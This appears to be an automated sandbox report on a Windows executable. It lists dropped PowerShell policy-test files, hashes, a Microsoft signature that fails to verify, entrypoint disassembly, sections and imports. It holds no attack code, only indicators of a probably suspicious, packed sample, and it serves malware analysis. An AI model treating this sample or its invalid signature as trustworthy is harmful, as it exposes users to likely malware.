                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_orvmkshe.l1i.ps1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_prqygdg3.you.ps1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_puofiyvk.2ah.ps1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q4bsip3y.0gk.ps1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rcrx2hs0.mp3.ps1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rgyksmoh.sfd.ps1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tyticb24.yeg.psm1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tzcmyddr.ugx.ps1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uj1dnrps.oxu.ps1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ulunyjmi.jsu.psm1

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                      \Device\ConDrv

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):97
                                                                                                                                                                                                                                      Entropy (8bit):4.331807756485642
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                                                                                                                                                                                                      MD5:195D02DA13D597A52F848A9B28D871F6
                                                                                                                                                                                                                                      SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                                                                                                                                                                                                      SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                                                                                                                                                                                                      SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...

                                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Entropy (8bit):7.991974525763679
                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                      File name:9g9LZNE4bH.exe
                                                                                                                                                                                                                                      File size:7'186'035 bytes
                                                                                                                                                                                                                                      MD5:03bb5937fb7b74837da488b2278d0811
                                                                                                                                                                                                                                      SHA1:51259fa1bf7608d3c394c2f7776f581d5251aa01
                                                                                                                                                                                                                                      SHA256:fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29
                                                                                                                                                                                                                                      SHA512:8f9a20db244661771745d353ae3669c8fa7be60ab3a68e4075de0500513b591b30ecf44e340fddcf92a09814fa4e796329dc6a49f4b309f0979c8fe73ed2e097
                                                                                                                                                                                                                                      SSDEEP:196608:OQV1vLB6ylnlPzf+JiJCsmFMvQn6hqgdhY:TLBRlnlPSa7mmvQpgdhY
                                                                                                                                                                                                                                      TLSH:E97633A5637409F6F9BAE33CC916D952B771F13943B0DA970390822A2F236D15E7BB01
                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d..

                                                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                                                      Icon Hash:17213117aa131369

                                                                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Entrypoint:0x14000ce20
                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                      Digitally signed:true
                                                                                                                                                                                                                                      Imagebase:0x140000000
                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                      Time Stamp:0x6778B497 [Sat Jan 4 04:09:59 2025 UTC]
                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                                      File Version Major:6
                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                      Import Hash:72c4e339b7af8ab1ed2eb3821c98713a

                                                                                                                                                                                                                                      Authenticode Signature

                                                                                                                                                                                                                                      Signature Valid:false
                                                                                                                                                                                                                                      Signature Issuer:CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                      Error Number:-2146869232
                                                                                                                                                                                                                                      Not Before, Not After
                                                                                                                                                                                                                                      • 16/11/2023 20:20:09 14/11/2024 20:20:09
                                                                                                                                                                                                                                      Subject Chain
                                                                                                                                                                                                                                      • CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                                                                                      Version:3
                                                                                                                                                                                                                                      Thumbprint MD5:9B7554FFA2D97FE692CB10D7B2E315A7
                                                                                                                                                                                                                                      Thumbprint SHA-1:D8FB0CC66A08061B42D46D03546F0D42CBC49B7C
                                                                                                                                                                                                                                      Thumbprint SHA-256:2D7FFCE2C256016291B67285456AA8DA779D711BBF8E6B85C212A157DDFBE77E
                                                                                                                                                                                                                                      Serial:3300000460CF42A912315F6FB3000000000460

                                                                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                      sub esp, 28h
                                                                                                                                                                                                                                      call 00007F9B98E2EFFCh
                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                      add esp, 28h
                                                                                                                                                                                                                                      jmp 00007F9B98E2EC1Fh
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                      sub esp, 28h
                                                                                                                                                                                                                                      call 00007F9B98E2F3C8h
                                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                                      je 00007F9B98E2EDC3h
                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                      mov eax, dword ptr [00000030h]
                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                      mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                                      jmp 00007F9B98E2EDA7h
                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                      cmp ecx, eax
                                                                                                                                                                                                                                      je 00007F9B98E2EDB6h
                                                                                                                                                                                                                                      xor eax, eax
                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                      cmpxchg dword ptr [0003570Ch], ecx
                                                                                                                                                                                                                                      jne 00007F9B98E2ED90h
                                                                                                                                                                                                                                      xor al, al
                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                      add esp, 28h
                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                      mov al, 01h
                                                                                                                                                                                                                                      jmp 00007F9B98E2ED99h
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                      sub esp, 28h
                                                                                                                                                                                                                                      test ecx, ecx
                                                                                                                                                                                                                                      jne 00007F9B98E2EDA9h
                                                                                                                                                                                                                                      mov byte ptr [000356F5h], 00000001h
                                                                                                                                                                                                                                      call 00007F9B98E2E4F5h
                                                                                                                                                                                                                                      call 00007F9B98E2F7E0h
                                                                                                                                                                                                                                      test al, al
                                                                                                                                                                                                                                      jne 00007F9B98E2EDA6h
                                                                                                                                                                                                                                      xor al, al
                                                                                                                                                                                                                                      jmp 00007F9B98E2EDB6h
                                                                                                                                                                                                                                      call 00007F9B98E3C2FFh
                                                                                                                                                                                                                                      test al, al
                                                                                                                                                                                                                                      jne 00007F9B98E2EDABh
                                                                                                                                                                                                                                      xor ecx, ecx
                                                                                                                                                                                                                                      call 00007F9B98E2F7F0h
                                                                                                                                                                                                                                      jmp 00007F9B98E2ED8Ch
                                                                                                                                                                                                                                      mov al, 01h
                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                      add esp, 28h
                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                      inc eax
                                                                                                                                                                                                                                      push ebx
                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                      sub esp, 20h
                                                                                                                                                                                                                                      cmp byte ptr [000356BCh], 00000000h
                                                                                                                                                                                                                                      mov ebx, ecx
                                                                                                                                                                                                                                      jne 00007F9B98E2EE09h
                                                                                                                                                                                                                                      cmp ecx, 01h
                                                                                                                                                                                                                                      jnbe 00007F9B98E2EE0Ch
                                                                                                                                                                                                                                      call 00007F9B98E2F33Eh
                                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                                      je 00007F9B98E2EDCAh
                                                                                                                                                                                                                                      test ebx, ebx
                                                                                                                                                                                                                                      jne 00007F9B98E2EDC6h
                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                      lea ecx, dword ptr [000356A6h]
                                                                                                                                                                                                                                      call 00007F9B98E3C0F2h

                                                                                                                                                                                                                                      Data Directories

                                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x3ca340x78.rdata
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x239c.rsrc
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x440000x2238.pdata
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x6d81030x2570
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x4a0000x764.reloc
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x3a0800x1c.rdata
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39f400x140.rdata
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x4a0.rdata
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                      Sections

                                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                      .text0x10000x29f700x2a000b8c3814c5fb0b18492ad4ec2ffe0830aFalse0.5518740699404762data6.489205819736506IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                      .rdata0x2b0000x12a280x12c00992bf2e70a36080901843ccdb74df699False0.5243229166666666data5.750783562792207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                      .data0x3e0000x53f80xe00dba0caeecab624a0ccc0d577241601d1False0.134765625data1.8392217063172436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                      .pdata0x440000x22380x24009cd1eac931545f28ab09329f8bfce843False0.4697265625data5.2645170849678795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                      .rsrc0x470000x239c0x2400d43da4c906ba0cc2fc5a4cbc40329f68False0.7578125data7.339187853433314IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                      .reloc0x4a0000x7640x800816c68eeb419ee2c08656c31c06a0fffFalse0.5576171875data5.2809528666624175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                      Resources

                                                                                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                      RT_ICON0x472200x11bPNG image data, 16 x 15, 8-bit colormap, non-interlaced1.03886925795053
                                                                                                                                                                                                                                      RT_ICON0x4733c0x16ePNG image data, 24 x 23, 8-bit colormap, non-interlaced1.030054644808743
                                                                                                                                                                                                                                      RT_ICON0x474ac0x1d9PNG image data, 32 x 30, 8-bit colormap, non-interlaced1.0232558139534884
                                                                                                                                                                                                                                      RT_ICON0x476880x2e1PNG image data, 48 x 45, 8-bit colormap, non-interlaced1.0149253731343284
                                                                                                                                                                                                                                      RT_ICON0x4796c0x451PNG image data, 64 x 60, 8-bit colormap, non-interlaced1.0099547511312217
                                                                                                                                                                                                                                      RT_ICON0x47dc00xce1PNG image data, 128 x 120, 8-bit colormap, non-interlaced1.0033363663936912
                                                                                                                                                                                                                                      RT_GROUP_ICON0x48aa40x5adata0.7777777777777778
                                                                                                                                                                                                                                      RT_VERSION0x48b000x38cPGP symmetric key encrypted data - Plaintext or unencrypted data0.45704845814977973
                                                                                                                                                                                                                                      RT_MANIFEST0x48e8c0x50dXML 1.0 document, ASCII text0.4694508894044857

                                                                                                                                                                                                                                      Imports

                                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                                      USER32.dllCreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                                                                                                                      COMCTL32.dll
